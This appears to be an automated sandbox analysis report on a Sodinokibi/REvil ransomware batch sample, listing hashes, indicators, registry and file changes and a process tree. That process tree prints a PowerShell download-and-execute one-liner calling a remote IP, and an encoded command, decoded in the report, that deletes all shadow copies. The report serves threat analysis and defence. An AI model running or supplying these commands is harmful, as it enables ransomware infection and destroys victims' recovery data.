Analysis
Max time kernel: 134s
Max time network: 53s
Platform: windows7_x64
Resource: win7v200430
Submitted: 05-05-2020 09:10

Static task: static1
Behavioral task: behavioral1
  Sample: DnRWHnp4.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: DnRWHnp4.bat
  Resource: win10v200430
General
Target: DnRWHnp4.bat
Size: 195B
MD5: 94468061a94b1bdd17ebc1b6bbb3e47b
SHA1: b4a5680c8598467c4a916ba37d936606820449be
SHA256: 3e7bed4a943497b3c8a6874e6981a1f3b1799f14f9a4987829baea095fbba311
SHA512: 18a6e54cbec9c80d7a03c6af01b1fc538c5d245dad3ea2c48fb2faf3773008fa50e1db201d4246c6019b94717fa7959607d9b71271442b93e787a786e691c166
Malware Config
Extracted (URL): http://185.103.242.78/pastes/DnRWHnp4
Extracted (file): C:\4711165170-readme.txt
  Family: sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA170DC00071CC2E
  http://decryptor.cc/CA170DC00071CC2E
Signatures

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  pid | process
  644 | powershell.exe

Suspicious use of WriteProcessMemory (5 IoCs)
  description | pid | process | target process
  PID 1432 wrote to memory of 644 | 1432 | cmd.exe | powershell.exe
  PID 644 wrote to memory of 1844 | 644 | powershell.exe | powershell.exe
  PID 644 wrote to memory of 1844 | 644 | powershell.exe | powershell.exe
  PID 644 wrote to memory of 1844 | 644 | powershell.exe | powershell.exe
  PID 644 wrote to memory of 1844 | 644 | powershell.exe | powershell.exe

Modifies service (2 TTPs, 4 IoCs)
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe

Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.

Enumerates connected drives (3 TTPs)

Drops file in Program Files directory (23 IoCs)
  description | ioc | process
  File opened for modification | \??\c:\program files\LockUnblock.ppt | powershell.exe
  File opened for modification | \??\c:\program files\RequestDisconnect.php | powershell.exe
  File opened for modification | \??\c:\program files\CheckpointHide.mpv2 | powershell.exe
  File opened for modification | \??\c:\program files\ConvertUse.DVR-MS | powershell.exe
  File opened for modification | \??\c:\program files\CompareInitialize.m4a | powershell.exe
  File opened for modification | \??\c:\program files\FindConfirm.dot | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\4711165170-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\ResizeCopy.vdw | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\4711165170-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\CheckpointConvert.vdx | powershell.exe
  File opened for modification | \??\c:\program files\CloseMeasure.tmp | powershell.exe
  File opened for modification | \??\c:\program files\ShowWait.wmx | powershell.exe
  File opened for modification | \??\c:\program files\DisableEdit.bmp | powershell.exe
  File opened for modification | \??\c:\program files\NewProtect.M2V | powershell.exe
  File opened for modification | \??\c:\program files\LimitExit.iso | powershell.exe
  File opened for modification | \??\c:\program files\OutOpen.wma | powershell.exe
  File opened for modification | \??\c:\program files\SaveMount.au3 | powershell.exe
  File opened for modification | \??\c:\program files\StopFormat.html | powershell.exe
  File opened for modification | \??\c:\program files\UnpublishRename.xlsb | powershell.exe
  File opened for modification | \??\c:\program files\UseReset.txt | powershell.exe
  File created | \??\c:\program files\4711165170-readme.txt | powershell.exe
  File created | \??\c:\program files (x86)\4711165170-readme.txt | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\4711165170-readme.txt | powershell.exe

Suspicious use of AdjustPrivilegeToken (7 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 644 | powershell.exe
  Token: SeDebugPrivilege | 644 | powershell.exe
  Token: SeDebugPrivilege | 1844 | powershell.exe
  Token: SeBackupPrivilege | 1580 | vssvc.exe
  Token: SeRestorePrivilege | 1580 | vssvc.exe
  Token: SeAuditPrivilege | 1580 | vssvc.exe
  Token: SeTakeOwnershipPrivilege | 644 | powershell.exe

Suspicious behavior: EnumeratesProcesses (5 IoCs)
  pid | process
  644 | powershell.exe
  644 | powershell.exe
  644 | powershell.exe
  1844 | powershell.exe
  1844 | powershell.exe

Blacklisted process makes network request (1 IoC)
  flow | pid | process
  1 | 644 | powershell.exe

Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\i920x0fj3.bmp" | powershell.exe

Makes http(s) request (1 IoC)
  Contacts server via http/https, possibly for C2 communication.
  description | flow | ioc
  HTTP URL | 1 | http://185.103.242.78/pastes/DnRWHnp4
Processes

C:\Windows\system32\cmd.exe (PID 1432)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\DnRWHnp4.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 644, child of 1432)
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/DnRWHnp4');Invoke-GZYYYWYTPJDW;Start-Sleep -s 10000"
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Sets desktop wallpaper using registry

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1844, child of 644)
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (The -e argument is UTF-16LE base64. It decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , i.e. deletion of all Volume Shadow Copies, which is what triggers the vssvc.exe activity below.)
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\vssvc.exe (PID 1580)
  C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken